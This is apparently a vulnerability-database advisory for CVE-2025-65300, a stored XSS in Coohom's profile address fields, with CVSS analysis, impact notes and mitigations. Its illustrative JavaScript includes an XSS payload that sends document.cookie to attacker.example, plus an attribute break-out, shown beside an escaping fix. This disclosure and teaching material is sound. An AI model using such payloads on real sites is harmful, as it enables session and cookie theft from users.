CVE-2025-65300: n/a
A stored Cross-Site Scripting (XSS) vulnerability exists in the Coohom SaaS Platform feVersion=1760060603897 (2025-10-28) in the Account Settings module, where unsanitized user input in Address fields (City, State, Country/Region) is rendered back to the page. Attackers can inject arbitrary JavaScript code, which executes when the affected profile page is viewed. This can lead to session hijacking, cookie theft, or arbitrary script execution in the victim's browser.
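As an added example (not Coohom's code; the field names, the HTML layout and the hostname attacker.example are assumptions), the following JavaScript shows the rendering defect the description reports, a profile template that concatenates stored address values straight into markup, next to the hardened version that encodes each value for its HTML context. The constructed record carries a script payload in City and an attribute break-out in Country/Region:

```javascript
// Added example, not Coohom's code: how a stored XSS in address fields
// arises from string-building HTML, and the contextual encoding that fixes it.
// Field names, layout and attacker.example are assumptions for illustration.

// Constructed profile record as an attacker would save it. The City payload
// reads document.cookie, which only succeeds if the session cookie lacks
// HttpOnly; the Country value closes the title attribute and adds a handler.
const poisonedProfile = {
  name: "A. User",
  city: '<img src=x onerror="fetch(\'https://attacker.example/c?\'+document.cookie)">',
  state: "Bavaria",
  country: 'Germany" onmouseover="alert(1)',
};

// Vulnerable pattern: values are concatenated into markup, so the browser's
// parser turns stored text into elements and attributes.
function renderProfileUnsafe(p) {
  return `<dl class="address">
  <dt>City</dt><dd>${p.city}</dd>
  <dt>State</dt><dd>${p.state}</dd>
  <dt>Country/Region</dt><dd title="${p.country}">${p.country}</dd>
</dl>`;
}

// Contextual HTML encoding: the five characters that can change meaning in
// element content or in a double-quoted attribute become entities.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Hardened pattern: every untrusted value passes through escapeHtml at the
// point where it enters markup. The payload is displayed, not executed.
function renderProfileSafe(p) {
  return `<dl class="address">
  <dt>City</dt><dd>${escapeHtml(p.city)}</dd>
  <dt>State</dt><dd>${escapeHtml(p.state)}</dd>
  <dt>Country/Region</dt><dd title="${escapeHtml(p.country)}">${escapeHtml(p.country)}</dd>
</dl>`;
}
```

In the unsafe output the stored City value becomes a real `<img>` element whose `onerror` handler runs for every viewer, and the Country value becomes an `onmouseover` attribute on the `<dd>`; in the safe output both survive only as inert text. The same encoding has to be applied in every template that prints these fields, and values placed into JavaScript, URLs or CSS need the encoder for that context rather than this HTML one.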
AI Analysis
Technical Summary
CVE-2025-65300 is a stored Cross-Site Scripting (XSS) vulnerability in the Coohom SaaS Platform, specifically within the Account Settings module. The address fields City, State and Country/Region are stored as entered and later rendered back into the profile page without output encoding, so an attacker who holds an account with ordinary user privileges (PR:L) can save a JavaScript payload in one of these fields. Whenever another user views the compromised profile page (UI:R), the payload executes in that user's browser under the origin of the Coohom application. Direct cookie theft succeeds only if the session cookie lacks the HttpOnly flag; even where the flag is set, the script can still issue authenticated requests on the victim's behalf, read page content and alter what the victim sees, which is why the vector scores both confidentiality and integrity (C:L/I:L) and leaves availability untouched (A:N). The vector given in this analysis, CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N, works out to a base score of 5.4 (Medium): network attack vector, low attack complexity, low privileges required and user interaction required. Scope is changed (S:C) because the vulnerable component is the server-side application while the impact lands in a different security authority, the victim's browser. No exploits are reported in the wild, but stored XSS needs no victim-targeted link: every viewer of the poisoned profile is affected, which matters in workspaces where member profiles are routinely opened by many users. The record lists no patch or vendor mitigation, so organizations must rely on compensating controls for now. The weakness is CWE-79; the fix is contextual output encoding at the point of rendering, with input validation as a secondary control.
Potential Impact
For European organizations using the Coohom SaaS Platform, the practical consequence is that any account holder who can edit their own address can attack every colleague or external collaborator who opens their profile. Hijacked sessions of users with access to project data or administrative functions can lead to data leakage or unauthorized actions within the platform. The exposure is most relevant to architecture, interior design and real estate firms that use Coohom for project collaboration and client management; compromised accounts can disrupt operations, damage reputation and, where personal data is exposed, create notification obligations under GDPR. Because the attacker needs an account and the victim must view the page, a disgruntled insider or a phished or shared collaborator account is the realistic entry point. The Medium rating reflects the limited impact per victim, but a privileged victim (for example, a workspace administrator reviewing a member's profile) lets the attacker act with that administrator's rights across the whole workspace. Organizations with broad Coohom usage across departments, or with many external collaborators, face the widest blast radius.
Mitigation Recommendations
Because Coohom is a vendor-hosted SaaS, customers cannot change how the platform encodes output, set its Content Security Policy or put their own web application firewall in front of it; those controls belong to Coohom. Vendor-side fixes to request are: 1) contextual HTML encoding of City, State and Country/Region (and every other profile field) at the point of rendering, or rendering them through DOM APIs that treat the value as text rather than markup; 2) a Content Security Policy that does not allow inline script, plus HttpOnly and SameSite attributes on session cookies so that a successful injection cannot read the cookie directly; 3) a length and character allow-list on address fields as a secondary control. Actions European customers can take now: 4) ask Coohom support for a fix timeline and a statement of which feVersion builds are affected; 5) review workspace membership and remove unused or unknown accounts, since any account holder can plant the payload; 6) if the platform offers an audit log or a member export, review recent address changes for HTML tags, inline event handlers or script; 7) brief administrators not to browse member profiles from an administrative session until a fix is confirmed, or to do so from a separate browser profile; 8) add a stored-XSS-in-SaaS scenario to the incident response plan, including forced re-authentication for users who viewed a poisoned profile.
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain, Sweden
Technical Details
- Data Version: 5.2
- Assigner Short Name: mitre
- Date Reserved: 2025-11-18T00:00:00.000Z
- Cvss Version: null
- State: PUBLISHED
Threat ID: 693871e8ef540ebbadbcf667
Added to database: 12/9/2025, 7:00:56 PM
Last enriched: 12/16/2025, 7:58:48 PM
Last updated: 2/5/2026, 2:25:58 AM